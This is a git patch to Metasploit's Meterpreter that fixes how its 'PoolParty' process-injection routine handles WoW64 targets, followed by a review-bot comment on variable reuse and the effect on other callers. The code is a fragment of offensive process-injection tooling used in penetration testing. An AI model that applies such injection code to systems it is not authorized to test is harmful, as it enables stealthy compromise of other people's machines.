From b18df9c9fe44bee5f0b0cba4fb998ada4e9a745f Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Mon, 2 Sep 2024 07:28:04 -0400 Subject: [PATCH] fix: handling WoW64 injection destinationArch --- c/meterpreter/source/metsrv/base_inject.c | 1 + c/meterpreter/source/metsrv/pool_party.c | 3 --- 2 files changed, 1 insertion(+), 3 deletions(-) diff --git a/c/meterpreter/source/metsrv/base_inject.c b/c/meterpreter/source/metsrv/base_inject.c index ce4a7716..8700699a 100644 --- a/c/meterpreter/source/metsrv/base_inject.c +++ b/c/meterpreter/source/metsrv/base_inject.c @@ -573,6 +573,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW memcpy(lpStub, x64tox86, sizeof(x64tox86) - 1); memcpy((LPBYTE)lpStub + sizeof(x64tox86) - 1, poolparty_stub_x86, sizeof(poolparty_stub_x86)); dwStubSize = sizeof(x64tox86) + sizeof(poolparty_stub_x86) - 2; + dwDestinationArch = PROCESS_ARCH_X64; } hTriggerEvent = CreateEvent(NULL, TRUE, FALSE, NULL); diff --git a/c/meterpreter/source/metsrv/pool_party.c b/c/meterpreter/source/metsrv/pool_party.c index c6407e8f..45b1a5b5 100644 --- a/c/meterpreter/source/metsrv/pool_party.c +++ b/c/meterpreter/source/metsrv/pool_party.c @@ -163,14 +163,11 @@ DWORD remote_tp_direct_insertion(HANDLE hProcess, DWORD dwDestinationArch, LPVOI pNtDll* ntDll = NULL; DWORD dwResult = ERROR_POOLPARTY_GENERIC; HANDLE hHeap = GetProcessHeap(); - dwDestinationArch = PROCESS_ARCH_X64; DWORD dwDirectSize = dwDestinationArch == PROCESS_ARCH_X64 ? TP_DIRECT_STRUCT_SIZE_X64 : TP_DIRECT_STRUCT_SIZE_X86; - WOW64_CONTEXT test = { 0 }; LPVOID *Direct = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwDirectSize); do { ntDll = GetOrInitNtDll(); - dprintf("%d fs offset: %p", sizeof(WOW64_CONTEXT), (QWORD)&test.SegFs - (QWORD)&test); if (ntdll == NULL) { BREAK_WITH_ERROR("[INJECT][inject_via_poolparty][remote_tp_direct_insertion] Cannot GetOrInitNtDll()", ERROR_POOLPARTY_GENERIC); }
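Review bot: The added `dwDestinationArch = PROCESS_ARCH_X64;` silently repurposes what appears to be a function parameter (the signature in the hunk header is cut off, but the name matches the `DWORD dwDestinationArch` parameter of remote_tp_direct_insertion in the pool_party.c hunk): before this line it describes the target process, after it it describes the architecture the prepended x64tox86 stub executes as, so any later use of the name in inject_via_poolparty — logging, technique selection — now sees x64 for a WoW64 target. A separate local keeps both meanings readable and the original value available, e.g. `DWORD dwStubArch = dwDestinationArch;` declared before the branch and `dwStubArch = PROCESS_ARCH_X64; // the x64tox86 switch stub presumably runs as native x64 inside the WoW64 process, so TP_DIRECT must use the x64 layout` here, with dwStubArch passed on to remote_tp_direct_insertion. At minimum the line deserves that comment, because without it the override reads like a bug rather than the intended fix. Note also that removing the hard-coded `dwDestinationArch = PROCESS_ARCH_X64;` in pool_party.c means any other caller passing PROCESS_ARCH_X86 now gets TP_DIRECT_STRUCT_SIZE_X86 where it previously always got the x64 size; worth confirming no other call site relied on that. inject_via_poolparty begins and ends outside the hunk.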